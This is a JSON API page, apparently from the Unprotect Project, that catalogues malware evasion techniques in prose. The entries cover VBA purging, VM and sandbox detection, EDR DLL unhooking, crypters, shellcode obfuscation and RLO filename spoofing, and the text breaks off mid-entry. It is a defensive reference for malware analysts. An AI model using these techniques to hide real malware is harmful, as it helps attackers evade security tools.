HTTP 200 OK
Allow: GET, POST, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept
{
"count": 363,
"next": "https://unprotect.it/api/techniques/?format=api&page=2",
"previous": null,
"results": [
{
"id": 382,
"key": "vba-purging",
"unprotect_id": "U0524",
"name": "VBA Purging",
"description": "VBA Purging is an obfuscation technique designed to evade detection mechanisms used in malware analysis. When a VBA macro is added to a Microsoft Office document, it is stored in two sections: the **PerformanceCache** (compiled VBA code) and the **CompressedSourceCode** (compressed VBA source code). In VBA Purging, the PerformanceCache (compiled code) is completely removed from the module stream, along with associated streams like `_SRP_`, which contain version-dependent compiled code data. Additionally, the `MODULEOFFSET` is set to `0` to indicate there is no compiled code.\r\n\r\nBy eliminating the PerformanceCache and its related components, VBA Purging prevents static analysis tools, antivirus programs, and YARA rules from detecting suspicious strings typically found in compiled VBA macros. The document retains its compressed VBA source code, but the compiled code, which many detection tools rely on, is no longer present. As a result, macros can still run using the decompressed source code, but security systems are less likely to detect them.\r\n\r\nThis technique is particularly useful for attackers as it significantly reduces detection rates in environments like VirusTotal, where purged documents show a much lower detection rate compared to non-purged versions.",
"resources": "https://blog.didierstevens.com/2020/06/22/vba-purging/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/purgalicious-vba-macro-obfuscation-with-vba-purging/?hl=en\r\nhttps://blog.nviso.eu/2020/02/25/evidence-of-vba-purging-found-in-malicious-documents/\r\nhttps://github.com/mandiant/OfficePurge\r\nhttps://beta-v1.malva.re/File/730a8401140edb4c79d563f306ca529e/Report\r\nhttps://beta-v1.malva.re/File/2433e76542036ab53b138a98eeda548a/Report",
"creation_date": "2024-09-20T08:23:29.515300Z",
"tags": "",
"modification_date": "2024-09-20T08:23:29.515342Z",
"category": [
2
],
"rules": [
162
],
"attachments": [],
"featured_api": [],
"contributors": [
45
]
},
{
"id": 381,
"key": "qemu-cpu-brand-evasion",
"unprotect_id": "U1350",
"name": "QEMU CPU brand evasion",
"description": "QEMU has the CPU brand value of \"QEMU Virtual CPU\" if KVM is not based on the VM",
"resources": "https://github.com/kernelwernel/VMAware",
"creation_date": "2024-09-02T15:41:22.679172Z",
"tags": "",
"modification_date": "2024-09-02T15:41:22.679195Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
39
]
},
{
"id": 380,
"key": "bochs-cpu-oversights-evasion",
"unprotect_id": "U1349",
"name": "bochs CPU oversights evasion",
"description": "bochs has multiple oversights in its CPU emulation, which allows us to detect if we're running in a bochs emulator:\r\n\r\nbochs may have invalid CPU brands that don't exist.\r\n\r\n* For AMD CPUs, the \"p\" in \"processor\" should be in capital, which bochs doesn't implement.\r\n* AMD CPUs have easter eggs for their K7 and K8 CPUs (\"IT'S HAMMER TIME\"), but bochs does not * implement this.",
"resources": "https://github.com/kernelwernel/VMAware\r\nhttps://pferrie.tripod.com/papers/attacks2.pdf",
"creation_date": "2024-08-30T07:03:34.377546Z",
"tags": "",
"modification_date": "2024-08-30T07:03:34.377573Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
39
]
},
{
"id": 379,
"key": "al-khaser_writewatch",
"unprotect_id": "U0134",
"name": "Al-Khaser_WriteWatch",
"description": "Default invalid parameter values of Al-Khaser's Anti-Debug technique (VirtualAlloc/MEM_WRITE_WATCH). Used for checking API hooks in debuggers/sandboxes.",
"resources": "https://github.com/LordNoteworthy/al-khaser/blob/967afa0d783ff9625caf1b069e3cd1246836b09f/al-khaser/AntiDebug/WriteWatch.cpp#L85",
"creation_date": "2024-08-19T07:02:04.800544Z",
"tags": "",
"modification_date": "2024-08-19T07:02:04.800589Z",
"category": [
3
],
"rules": [
160
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 378,
"key": "windefavemu_goatfiles",
"unprotect_id": "U1348",
"name": "WinDefAVEmu_goatfiles",
"description": "Goat files inside Defender AV Emulator's file system. Often used in PE malware as an evasion technique to evade executing in Windows Defender's AV Emulator.",
"resources": "",
"creation_date": "2024-08-19T06:52:45.614536Z",
"tags": "",
"modification_date": "2024-08-19T06:59:19.545739Z",
"category": [
1
],
"rules": [
161
],
"attachments": [],
"featured_api": [],
"contributors": [
44
]
},
{
"id": 377,
"key": "ipv4ipv6-obfuscation",
"unprotect_id": "U0710",
"name": "IPV4/IPV6 Obfuscation",
"description": "The obfuscated payload masquerades itself as an array of ASCII IPv4 addresses. Each one of these IPs is passed to the [`RtlIpv4StringToAddressA`](https://learn.microsoft.com/en-us/windows/win32/api/ip2string/nf-ip2string-rtlipv4stringtoaddressa) function, which will translate the ASCII IP string to binary. The binary representation of all of these IPs is combined to form a blob of shellcode. Additionally, IPfuscation variants were spotted using IPv6 instead of IPv4 addresses, UUIDs, and MAC addresses, all operating in almost the same way.",
"resources": "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/\r\nhttps://www.bleepingcomputer.com/news/security/hive-ransomware-uses-new-ipfuscation-trick-to-hide-payload/\r\nhttps://cyware.com/news/ipfuscation-is-hives-new-technique-to-evade-detection-96c3c748",
"creation_date": "2024-08-19T06:40:08.344835Z",
"tags": "",
"modification_date": "2024-08-19T06:40:08.344877Z",
"category": [
7
],
"rules": [],
"attachments": [],
"featured_api": [
637,
638
],
"contributors": [
43
]
},
{
"id": 376,
"key": "appinit-dll-injection",
"unprotect_id": "U1244, T1546",
"name": "AppInit DLL Injection",
"description": "Any **Dynamic Link Libraries (DLL)** that are specified within the `AppInit_DLLs` registry key values are loaded by user32.dll into any process that utilizes user32.dll. So by modifying the `AppInit_DLLs` registry key value and pointing it to a malicious DLL, an attacker can force the system to load their DLL into every process that utilizes user32.dll and force it to execute their code.",
"resources": "https://attack.mitre.org/techniques/T1546/010/",
"creation_date": "2024-08-17T16:05:00.052918Z",
"tags": "",
"modification_date": "2024-08-17T16:08:18.408557Z",
"category": [
4,
10
],
"rules": [],
"attachments": [],
"featured_api": [
313,
321,
331
],
"contributors": [
41
]
},
{
"id": 375,
"key": "vboxenumshares",
"unprotect_id": "U1347",
"name": "VboxEnumShares",
"description": "This method represents a variation of the `WNetGetProviderName(WNNC_NET_RDR2SAMPLE, ...)` approach, which is typically employed to determine if the network share's provider name is specific, such as VirtualBox. Instead of relying on this well-established technique, we utilize `WNetOpenEnum` and `WNetEnumResource` functions to iterate through each network resource. The primary objective is to identify VirtualBox shared folders, which typically feature \"VirtualBox\" or \"VBoxSrv\" substrings in their names. The latter, VBoxSrv, serves as a pseudo-network redirector provided by VirtualBox, enabling access to shared folders within the guest OS. These folders are sub-resources of the VirtualBox Shared Folder resource. By systematically enumerating these folders, a malware sample can ascertain the presence of the hypervisor in an alternative manner.",
"resources": "",
"creation_date": "2024-08-17T07:29:17.120471Z",
"tags": "",
"modification_date": "2024-08-17T07:29:17.120515Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [
631,
632,
633,
634,
635,
636
],
"contributors": [
36
]
},
{
"id": 374,
"key": "cronos-crypter",
"unprotect_id": "U1437",
"name": "Cronos-Crypter",
"description": "Cronos-Crypter is an open-source crypter publicly available on GitHub. The crypter applies AES encryption or XOR obfuscation to a selected payload before storing it as a .NET resource of a final generated .NET executable payload. Cronos-Crypter contains multiple capabilties for persistence and defense evasion. An operator may select persistence via a Windows Registry autorun key or a Scheduled Task. An operator may also select for decrypted payloads to be injected into a newly spawned copy of itself or `regasm.exe`. To further evade defenses, the operator may also specify to introduce a sleep delay, bypass AMSI controls, and avoid execution within virtual machine environments.",
"resources": "https://github.com/TalosSec/Cronos-Crypter",
"creation_date": "2024-08-17T07:18:57.605535Z",
"tags": "",
"modification_date": "2024-08-17T07:18:57.605578Z",
"category": [
12
],
"rules": [
158
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 373,
"key": "odd-thread-count",
"unprotect_id": "U1346",
"name": "Odd Thread Count",
"description": "The thread count of the CPU must be an even number, which allows us to detect whether the thread count has been modified through the VM creation stage. If the thread count is not an even number, this is a sign of thread tampering (with a few exceptions which are already covered).",
"resources": "https://github.com/kernelwernel/VMAware\r\nhttps://en.wikichip.org/wiki/WikiChip",
"creation_date": "2024-08-17T07:04:12.123607Z",
"tags": "",
"modification_date": "2024-08-17T07:04:12.123649Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
39
]
},
{
"id": 372,
"key": "hyper-v-signature",
"unprotect_id": "U1345",
"name": "Hyper-V Signature",
"description": "Hyper-V has a signature value of \"Hv#1\" in eax if leaf `0x40000001` is provided to CPUID.",
"resources": "https://github.com/kernelwernel/VMAware\r\nhttps://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/tlfs/feature-discovery",
"creation_date": "2024-08-17T07:01:43.936498Z",
"tags": "",
"modification_date": "2024-08-17T07:01:43.936541Z",
"category": [
1
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
39
]
},
{
"id": 371,
"key": "ntdelayexecution",
"unprotect_id": "U1344,U0133",
"name": "NtDelayExecution",
"description": "[NtDelayExecution](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtDelayExecution.html) can be used to delay the execution of the calling thread. NtDelayExecution accepts a parameter \"DelayInterval\", which is the number of milliseconds to delay. Once executed, NtDelayExecution \"pauses\" execution of the calling program whuch can cause a timeout of the sandbox or loss of control in a debugger. \r\n\r\nAdditionally, some higher level WinAPI functions invoke NtDelayExeuction. For example, the WinAPI function [Beep](https://learn.microsoft.com/en-us/windows/win32/api/utilapiset/nf-utilapiset-beep), which plays an audible tone for a specified number of milliseconds, calls into NtDelayExecution. In this manner, malware can invoke the Beep function to similarly cause a delay in the program execution.",
"resources": "http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtDelayExecution.html\r\nhttps://securityliterate.com/beeeeeeeeep-how-malware-uses-the-beep-winapi-function-for-anti-analysis/",
"creation_date": "2024-08-17T06:49:17.495641Z",
"tags": "",
"modification_date": "2024-08-17T06:53:15.129268Z",
"category": [
1,
3
],
"rules": [],
"attachments": [],
"featured_api": [
629,
630
],
"contributors": [
11
]
},
{
"id": 370,
"key": "runtime-function-decryption",
"unprotect_id": "U0523",
"name": "Runtime Function Decryption",
"description": "This technique is used to store the function body in an encrypted form. They will only be decrypted just before the execution of that code and will be re-encrypted after the code has been executed. \r\n\r\nThis technique is used by SmokeLoader to evade anti-virus and EDRs, since the function body is in encrypted form except at the time of execution of the function. It also makes the static analysis of SmokeLoader harder.",
"resources": "https://irfan-eternal.github.io/understanding-internals-of-smokeloader/#encrypted-function-code",
"creation_date": "2024-03-22T06:30:48.583023Z",
"tags": "encryption, smokeloader",
"modification_date": "2024-03-22T06:30:48.583077Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
38
]
},
{
"id": 369,
"key": "blockinput",
"unprotect_id": "U1011",
"name": "BlockInput",
"description": "As per Microsoft's documentation, `BlockInput` function \"prevents keyboard and mouse input events from reaching applications,\" effectively restricting user interaction with the system. \r\n\r\nMalware occasionally employs this tactic to hinder analysis by debuggers or other analysis tools throughout the process' runtime. To deactivate the block, the program must make a live call to `BlockInput` with the parameter 0. Windows automatically lifts the block when the process ends or the user initiates `Ctrl+Alt+Del`.",
"resources": "https://malware.news/t/art-of-anti-detection-4-self-defense/32182",
"creation_date": "2024-03-22T06:24:53.208170Z",
"tags": "blockinput, keyboard",
"modification_date": "2024-03-22T06:24:53.208229Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [
628
],
"contributors": [
37
]
},
{
"id": 368,
"key": "retrieve-hdd-information",
"unprotect_id": "U1343",
"name": "Retrieve HDD Information",
"description": "Malware can figure out if it's in a virtual environment by checking hard drive info. It looks for specific details like serial and model numbers. This is easier to spot in VirtualBox because it shows clues that it's running in a virtual space. \r\n\r\nMalware uses this trick to avoid getting caught. It does this by using a special command in the DeviceIoControl Win32 API, called IOCTL SMART_RCV_DRIVE_DATA. But, to use this command, you need top-level access.",
"resources": "https://nicolabottura.github.io/HDDInfo-Evasion-PoC.html",
"creation_date": "2024-03-20T23:27:16.117731Z",
"tags": "malware-detection, virtual-environment-evasion, hard-drive-inspection, virtualbox, deviceiocontrol-api, root-privileges, cybersecurity-tactics, evasion-techniques",
"modification_date": "2024-03-20T23:27:16.117783Z",
"category": [
1
],
"rules": [
157
],
"attachments": [],
"featured_api": [
627
],
"contributors": [
36
]
},
{
"id": 367,
"key": "buildcommdcbandtimeouta",
"unprotect_id": "U1342, T1497.002",
"name": "BuildCommDCBAndTimeoutA",
"description": "This technique uses a `BuildCommDCBAndTimeoutsA` API call to determine if the malware is detonating in a sandbox. Normally, a bogus device string would cause this API call to fail. However, some malware sandbox environments may emulate in a way that allows the API call to succeed even when given a bogus device string.",
"resources": "",
"creation_date": "2024-03-20T00:00:50.060144Z",
"tags": "BuildCommDCBAndTimeoutsA, sandbox evasion",
"modification_date": "2024-03-20T00:10:09.498989Z",
"category": [
1
],
"rules": [
156
],
"attachments": [],
"featured_api": [
626
],
"contributors": [
35
]
},
{
"id": 366,
"key": "limecrypter",
"unprotect_id": "U1436",
"name": "LimeCrypter",
"description": "Limecrypter is a sophisticated obfuscation tool designed for both native and .NET files. It employs a unique approach to secure payloads by encrypting them within a .NET-based stub. This stub acts as a container for the encrypted payload, ensuring its contents remain concealed until execution.",
"resources": "https://github.com/NYAN-x-CAT/Lime-Crypter/tree/master\r\nhttps://www.youtube.com/watch?v=TgYb3hwOAV4",
"creation_date": "2024-01-18T01:13:04.663000Z",
"tags": "crypter, limecrypter",
"modification_date": "2024-01-18T01:13:27.449000Z",
"category": [
12
],
"rules": [
155
],
"attachments": [],
"featured_api": [],
"contributors": [
32
]
},
{
"id": 365,
"key": "pyarmor",
"unprotect_id": "U1435",
"name": "PyArmor",
"description": "Pyarmor is a command-line tool primarily used for the obfuscation of Python scripts. While its original design aims to protect Python code from unauthorized access and reverse engineering, its capabilities also make it a tool of interest for malware obfuscation. Pyarmor achieves this through several key features, each with potential applications in both legitimate protection and malicious exploitation:\r\n\r\n- Code Obfuscation: Pyarmor transforms original Python scripts into a form that is significantly more difficult to understand and decompile. This obfuscation process, which alters code structure, names, and other identifiable features while preserving functionality, is a common tactic in malware to conceal harmful operations and evade detection by analysis tools and researchers.\r\n\r\n- Machine Binding: The tool offers the option to bind obfuscated scripts to a specific machine. In legitimate use, this adds security and control over script distribution. In a malware context, this can be misused to target specific victims or to avoid execution in analysis environments, thus evading detection and analysis.\r\n\r\n- Expiration Setting: Pyarmor can set an expiration date for the obfuscated scripts. While beneficial for creating trial software in legitimate scenarios, this feature can be exploited in malware to limit the script's lifespan, making post-infection analysis and reverse engineering more challenging.",
"resources": "http://pyarmor.dashingsoft.com/\r\nhttps://github.com/dashingsoft/pyarmor",
"creation_date": "2024-01-18T01:09:12.754000Z",
"tags": "python, obfuscation",
"modification_date": "2024-01-18T01:09:12.754000Z",
"category": [
12
],
"rules": [
154
],
"attachments": [],
"featured_api": [],
"contributors": [
5,
32
]
},
{
"id": 364,
"key": "niximports",
"unprotect_id": "U1434",
"name": "NixImports",
"description": "A .NET malware loader employs API-Hashing and dynamic invocation to circumvent static analysis. NixImports utilizes managed API-Hashing to dynamically determine most of its required functions during runtime. For function resolution, HInvoke needs two specific hashes: typeHash and methodHash, representing the type name and the method's full name, respectively. At runtime, HInvoke scans the entire mscorlib to locate the corresponding type and method. Consequently, HInvoke doesn't generate any import references for the methods accessed through it.\r\n\r\nAdditionally, NixImports is designed to minimize the use of well-known methods. Wherever possible, it opts for internal methods over their standard wrappers. This strategy helps in evading the basic hooks and monitoring systems used by certain security tools.",
"resources": "https://github.com/dr4k0nia/NixImports/tree/master\r\nhttps://dr4k0nia.github.io/posts/NixImports-a-NET-loader-using-HInvoke/",
"creation_date": "2024-01-14T07:42:17.781000Z",
"tags": "NixImports, packer, .net",
"modification_date": "2024-01-14T07:47:41.089000Z",
"category": [
12
],
"rules": [
148,
149
],
"attachments": [],
"featured_api": [],
"contributors": [
32,
34
]
},
{
"id": 363,
"key": "powershell-special-characters-obfuscation",
"unprotect_id": "U0709",
"name": "PowerShell Special Characters Obfuscation",
"description": "PowerShell scripts can be obfuscated using methods that encode commands exclusively with special characters. This technique aims to complicate analysis and potentially evade detection mechanisms. \r\n\r\nAttackers frequently employ these tactics to hide the true functionalities of the script, making the analysis more challenging.",
"resources": "https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-EncodedSpecialCharOnlyCommand.ps1\r\nhttps://perl-users.jp/articles/advent-calendar/2010/sym/11",
"creation_date": "2024-01-12T10:26:52.204000Z",
"tags": "PowerShell, obfuscation",
"modification_date": "2024-01-12T10:31:41.654000Z",
"category": [
7
],
"rules": [
147
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 362,
"key": "purecrypter",
"unprotect_id": "U1433",
"name": "PureCrypter",
"description": "PureCrypter, a multi-functional crypter/loader developed in C#, was first introduced in hacking forums on March 17, 2021. This tool is compatible with both 32-bit and 64-bit native as well as .NET payloads. It features multiple injection modes, including reflection, RunPE, and shellcode. PureCrypter can deliver payloads either via a URL or offline. It has been noted for its use in conjunction with various RATs and infostealers, such as Remcos, AsyncRAT, Redline Stealer, and Arkei.",
"resources": "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
"creation_date": "2024-01-09T23:56:58.234000Z",
"tags": "PureCrypter, Packer",
"modification_date": "2024-01-09T23:56:58.234000Z",
"category": [
12
],
"rules": [
143
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 361,
"key": "truecrypt",
"unprotect_id": "U1432",
"name": "TrueCrypt",
"description": "TrueCrypt, a crypter developed and sold by the developers behind Meduza Stealer, which features LoadPE functionality and is written in Golang, supports both native (x32) and .NET binaries. This crypter has been used by Lumma, Vidar, Raccoon, MetaStealer, Redline stealers, and DCRAT.",
"resources": "https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web",
"creation_date": "2024-01-07T03:34:48.764000Z",
"tags": "truecrypt, packer",
"modification_date": "2024-01-07T03:34:48.764000Z",
"category": [
12
],
"rules": [
141
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 360,
"key": "easycrypter",
"unprotect_id": "U1431",
"name": "EasyCrypter",
"description": "EasyCrypter is the crypter that is being sold via an automated bot on Telegram. The crypter uses a method known as \"mutation\", which involves replacing instructions in the file with their analogues or a sequence of instructions that yield the same outcome as the original code. EasyCrypter supports a maximum file size of 5MB and is only applicable for x86 .NET/Native files.",
"resources": "https://teletype.in/@dinerosell/EasyCrypterFAQ_RU",
"creation_date": "2024-01-05T22:18:00.904000Z",
"tags": "packers, easycrypter",
"modification_date": "2024-01-05T22:18:00.904000Z",
"category": [
12
],
"rules": [
139
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 359,
"key": "funcin",
"unprotect_id": "U0132,U0221,U0308",
"name": "FuncIn",
"description": "FuncIn involves a payload staging strategy wherein the entire set of malicious functionalities is not contained within the malware file itself or any third-party file/network location (e.g., a web server). Instead, these functionalities are transmitted over the network by the Command and Control (C2) server when required.\r\n\r\nThis approach addresses three primary issues in malware development. Firstly, it mitigates the size of the malware, as most functionalities are not directly embedded in the malware. Functioning as a network loader, the malware can be very compact (often just a few kilobytes). Secondly, it tackles the challenges posed by malware analysis and detection. The absence of most malicious functionalities physically within the malware or its immediate dependencies can make reverse engineering and detection more challenging. For instance, if the malware loader expects specific characteristics to be met before transmitting the rest of the payload (e.g., geographic location, system requirements, certain user or host machine behaviour, and properties), analysis becomes difficult until the complete payload is downloaded. Lastly, it addresses maintenance concerns. The majority of the code residing on the C2 side makes maintenance more convenient. Malicious actors do not need to update the remote loader but only the shellcodes (functionalities) located on the C2, transmitted when needed. \r\n\r\nOne notable example of malware leveraging the FuncIn technique is PoisonIvy RAT, a famous Remote Access Trojan. Despite its compact size, typically less than 8 kilobytes, PoisonIvy RAT incorporated a wide range of expected functions for a RAT, including webcam capture, screen capture, password enumeration, system management, and file management etc..\r\n\r\nThe author of PoisonIvy RAT employed an approach of using precompiled pieces of code (shellcodes). However, with the advent of more modern tools, it is now easily feasible to compile the shellcodes just in time (JIT) before sending them to the loader. This JIT compilation enhances the adaptability and sophistication of the malware, allowing it to dynamically adjust its functionalities based on specific criteria.\r\n\r\nUnlike classic PIC , shellcodes commonly used in binary exploitation, FuncIn doesn't rely on library loading or API hashing mechanisms (at least, it don’t need to, except for additional evasion mechanisms) directly within the shellcode. Instead, these tasks are delegated to the loader, which then transmits essential information to the Command and Control (C2) server for shellcode JIT compilation or patching.\r\n\r\nAnother alternative to the FuncIn technique is loading malware functionalities through extra DLL files that are reflected to avoid being written to disk, minimising physical evidence. This approach relies on DLLs rather than shellcode, offering several advantages. In addition to supporting any high-level programming language for coding extra features, using DLLs makes it easier to maintain and extend the malware's capabilities.\r\n\r\nHowever, it's important to note that while relying on DLLs provides advantages in terms of ease of maintenance, extensibility, and language support, it may be less optimised and stealthy compared to the approach of utilising small, fully controlled pieces of code that the malware author has mastered. The choice between these techniques often involves trade-offs, considering factors such as the specific goals of the malware, the targeted systems, and the overall strategy of the threat actor.\r\n\r\nAttached to this description, you will discover a comprehensive project showcasing the FuncIn Evasion Technique, implemented with the assistance of the [Keystone Engine](https://www.keystone-engine.org). This project is designed to expand, incorporating additional examples in various programming languages. Given that the majority of the functionality resides in the shellcode, the choice of programming language for the loader is not highly restrictive. It's essential to note that the loader is typically compact and straightforward, tasked with loading and executing pieces of code within its process space.",
"resources": "https://github.com/Unprotect-Project/FuncInEvasionTechniqueDemo/tree/main",
"creation_date": "2023-12-13T16:08:17.059000Z",
"tags": "Shellcode, FuncIn, Plugins, Reflection, DLL, JIT",
"modification_date": "2023-12-13T16:37:18.308000Z",
"category": [
2,
3,
5,
8
],
"rules": [],
"attachments": [],
"featured_api": [
2,
3,
4,
5
],
"contributors": [
4
]
},
{
"id": 358,
"key": "process-argument-spoofing",
"unprotect_id": "U1243",
"name": "Process Argument Spoofing",
"description": "Process Argument Spoofing is a technique used by attackers to hide their true intentions by changing the command line arguments of a process after it has started. This is done by tampering with the Process Environment Block (PEB).\r\n\r\nThe PEB is a structure in Windows that holds various information about a running process. Within the PEB, there's a specific section called `RTL_USER_PROCESS_PARAMETERS`. This section contains an attribute named CommandLine, which is structured as a `UNICODE_STRING`. The CommandLine attribute is crucial because it stores the command line arguments that were used to start the process.\r\n\r\nAttackers exploit this by modifying the CommandLine attribute's buffer. When they change the contents of this buffer, the command line arguments that are visible to monitoring tools and security analysts are altered. This means that even if a process was started with malicious intentions, the attackers can overwrite these initial arguments with harmless-looking ones. As a result, the process can appear legitimate to security systems and analysts, and potentially hiding the malicious activity.\r\n\r\nThe sophistication of Process Argument Spoofing lies in its ability to alter process information after the process has been created and initially inspected by security tools, making it a bit more challenging to detect.",
"resources": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/\r\nhttps://www.bordergate.co.uk/argument-spoofing/",
"creation_date": "2023-12-12T05:13:02.378000Z",
"tags": "Process Argument Spoofing, PEB Manipulation, Command Line Argument Tampering, Low-Level System Manipulation,",
"modification_date": "2023-12-13T06:09:46.828000Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
6,
357,
625
],
"contributors": [
30
]
},
{
"id": 357,
"key": "smb-named-pipes",
"unprotect_id": "U9011",
"name": "SMB / Named Pipes",
"description": "Named Pipes are a feature of the Windows operating system that allow for inter-process communication (IPC) using a pipe metaphor. These are particularly useful in networking scenarios as they can be made accessible over a network and facilitate a client-server model of communication. The SMB (Server Message Block) protocol is commonly used in Windows environments for shared access to files, printers, and other network services.\r\n\r\nWhen malware uses Named Pipes over the SMB protocol for network evasion, it is essentially wrapping its communication in layers of legitimate-looking traffic. Named Pipes can be set up to pass data packets that may appear harmless or even normal to network monitoring tools. This makes detection harder because the malicious traffic is mixed with regular, authorized network activity.",
"resources": "https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes?WT_mc_id=SEC-MVP-5005282\nhttps://learn.microsoft.com/en-us/dotnet/standard/io/pipe-operations?WT_mc_id=SEC-MVP-5005282\nhttps://github.com/DarkCoderSc/SharpShellPipe",
"creation_date": "2023-08-27T16:55:16.842000Z",
"tags": "Named Pipes, SMB, Network, Pivot, Evasion",
"modification_date": "2023-10-04T10:44:36.278000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [
23,
380,
450,
620,
621,
622,
623,
624
],
"contributors": [
4
]
},
{
"id": 356,
"key": "right-to-left-override-rlo-extension-spoofing",
"unprotect_id": "U1010",
"name": "Right-to-Left Override (RLO) Extension Spoofing",
"description": "The **Right-to-Left Override** (RLO) character (`U+202E`) is a Unicode control character used for bidirectional text formatting. It affects the way text is displayed, causing text following the RLO character to be rendered from right to left, which is typically used in languages like Arabic and Hebrew.\r\n\r\nHowever, malicious actors have found a way to exploit this Unicode character to deceive users by using it in file extensions. By strategically placing the RLO character within a file name, they can manipulate the visual appearance of the extension while maintaining its actual content.\r\n\r\nFor example, consider a file named \"invoice.pdf\" with the RLO character followed by malicious code: `invoice\\u202Efdp.exe`. When displayed in certain contexts, it may appear as `invoiceexe.pdf` (hiding the \".exe\" extension) instead of the actual \"invoice.pdf.exe\". This tactic aims to trick users into believing the file is harmless when, in reality, it could be a dangerous executable.",
"resources": "",
"creation_date": "2023-08-03T06:17:48.602000Z",
"tags": "Extension, Spoof, RLO, Filename",
"modification_date": "2024-01-15T00:01:09.968000Z",
"category": [
14
],
"rules": [
151
],
"attachments": [],
"featured_api": [],
"contributors": [
4,
32
]
},
{
"id": 355,
"key": "dll-unhooking",
"unprotect_id": "U0522",
"name": "DLL Unhooking",
"description": "Endpoint Detection and Response (EDR) tools use a technique known as hooking to monitor sensitive system functions within the DLLs of loaded processes. Hooking is a method of live-patching system DLLs, enabling EDRs to intercept the flow of a program and evaluate its legitimacy.\r\n\r\nHere's how it works: EDRs modify the first instructions of the functions within the DLLs. When these functions are called, the program's execution flow is diverted to the EDR's code (housed within a DLL loaded by the EDR in the program). In this redirected state, the EDR can inspect the function's arguments to determine whether their usage is legitimate or potentially malicious. If the usage is deemed legitimate, the EDR restores the program's execution flow, allowing the function to proceed as normal.\r\n\r\nHowever, to evade detection by an EDR, malware can employ a method known as \"unhooking.\" This process involves restoring the entire DLL code section (.text) to its original state. To accomplish this, malware needs access to an unmodified (unhooked) DLL, which it can acquire in several ways: \r\n\r\n1 - directly from the system, which can potentially be detected via an open handle; \r\n\r\n2 - by opening a remote file, which requires the malware author to host a DLL matching the OS version of the target system remotely;\r\n\r\n3 - by initiating a suspended process and retrieving the content of its DLL before it gets hooked.\r\n\r\nTypically, the DLL most commonly hooked/unhooked is NTDLL.dll, as it is the closest to the kernel. However, some EDRs may also hook APIs contained in higher-level DLLs, such as kernel32.dll or user32.dll.",
"resources": "https://github.com/optiv/Freeze\nhttps://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++",
"creation_date": "2023-07-03T23:56:46.302000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:56.825000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
29
]
},
{
"id": 354,
"key": "shikata-ga-nai-sgn",
"unprotect_id": "U0708",
"name": "Shikata Ga Nai (SGN)",
"description": "Shikata Ga Nai (SGN) is a data obfuscation technique that employs a polymorphic binary encoding scheme. It was initially developed by Ege Balci and gained popularity through its implementation in Metasploit Framework's msfvenom. SGN takes a binary input and generates a self-decoding obfuscated shellcode. The algorithm utilizes a XOR feedback loop for encoding and prefixes a decoding routine to the payload. Additional garbage instructions are added to enhance obfuscation and make the payload highly resistant to static heuristic analysis. The resulting blob can be executed from the first instruction, which will decode and run the original binary payload. It's important to note that the SGN-encoded shellcode requires a RWX (Read-Write-Execute) protected memory space for proper execution.",
"resources": "https://github.com/EgeBalci/sgn\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb\nhttps://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong",
"creation_date": "2023-07-03T23:47:32.505000Z",
"tags": "Shikata Ga Nai (SGN), data obfuscation, polymorphic binary encoding scheme, Ege Balci, msfvenom, self-decoding obfuscated shellcode, XOR feedback loop",
"modification_date": "2023-10-04T10:44:32.987000Z",
"category": [
7
],
"rules": [
134
],
"attachments": [],
"featured_api": [],
"contributors": [
29
]
},
{
"id": 353,
"key": "c2-via-ftps",
"unprotect_id": "U0910",
"name": "C2 via FTP(S)",
"description": "C2 via FTP is a technique that utilizes the File Transfer Protocol (FTP) to establish command and control communication between an attacker and victim systems. It involves sending commands and receiving responses within FTP sessions, effectively using FTP as a conduit for covert communication.\r\n\r\nTo implement C2 via FTP, an attacker needs control over an FTP server, and must establish a connection to a compromised system that has access to an external network. The victim’s system must be capable of initiating FTP sessions with the attacker's server. Additionally, the attacker could employ various means of obfuscation to make the traffic appear innocuous and blend in with legitimate FTP traffic.\r\n\r\nC2 via FTP can serve diverse objectives, such as remotely executing commands, managing malware, or orchestrating multistage attacks. Detecting C2 via FTP can be challenging, as FTP is a widely-used protocol for legitimate file transfers, and the malicious traffic may not raise alarms in a network’s security monitoring systems. Moreover, if FTPS (FTP Secure) is used, the data is encrypted, adding an additional layer of complexity to detection.",
"resources": "https://github.com/DarkCoderSc/SharpFtpC2",
"creation_date": "2023-06-12T08:10:43.726000Z",
"tags": "C2, FTP, FTPS, File",
"modification_date": "2023-10-04T10:44:31.505000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [
23,
25,
290,
380,
381,
383,
450,
452,
459,
485,
603,
604,
605,
